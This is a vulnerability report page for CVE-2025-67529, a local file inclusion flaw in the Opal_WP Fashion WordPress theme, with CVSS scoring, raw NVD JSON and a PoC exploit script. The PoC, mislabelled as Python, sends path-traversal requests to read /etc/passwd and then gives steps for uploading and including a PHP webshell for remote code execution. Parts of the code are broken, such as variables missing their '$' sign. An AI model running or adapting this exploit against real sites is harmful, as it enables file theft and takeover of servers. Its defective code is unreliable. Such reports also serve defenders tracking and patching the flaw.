Security Vulnerability Report
中文
CVE-2025-67529 CVSS 7.5 HIGH

CVE-2025-67529

Published: 2025-12-09 16:18:28
Last Modified: 2026-04-27 18:16:42

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Opal_WP Fashion fashion2 allows PHP Local File Inclusion.This issue affects Fashion: from n/a through < 5.3.0.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Opal_WP Fashion < 5.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-67529 PoC - WordPress Fashion Theme LFI Exploitation * Target: Opal_WP Fashion theme < 5.3.0 * * This PoC demonstrates local file inclusion vulnerability * Usage: php poc.php <target_url> [attack_vector] */ $targetUrl = $argv[1] ?? ''; $attackVector = $argv[2] ?? 'template'; if (empty($targetUrl)) { echo "Usage: php poc.php <target_url> [attack_vector]\n"; echo "Example: php poc.php http://victim.com/custom-action\n"; exit(1); } // LFI Payload - Path traversal to read /etc/passwd evilPayload = "../../../../../../etc/passwd"; // Construct exploitation URL evilUrl = rtrim($targetUrl, '/') . "/?" . $attackVector . "=" . urlencode($evilPayload); echo "[*] CVE-2025-67529 Exploitation PoC\n"; echo "[*] Target: " . $targetUrl . "\n"; echo "[*] Sending malicious request...\n"; // Initialize cURL $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $evilUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); echo "[*] HTTP Response Code: " . $httpCode . "\n"; if (strpos($response, 'root:') !== false) { echo "[!] VULNERABLE! File inclusion successful - /etc/passwd leaked:\n"; echo "---\n" . $response . "\n---\n"; } else { echo "[-] Target may not be vulnerable or file not found\n"; } echo "\n[*] For RCE: Upload PHP shell via avatar upload, then include it:\n"; echo "[>] URL: " . rtrim($targetUrl, '/') . "/?" . $attackVector . "=../wp-content/uploads/evil.php\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67529", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:27.553", "lastModified": "2026-04-27T18:16:41.693", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Opal_WP Fashion fashion2 allows PHP Local File Inclusion.This issue affects Fashion: from n/a through < 5.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/fashion2/vulnerability/wordpress-fashion-theme-5-3-0-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}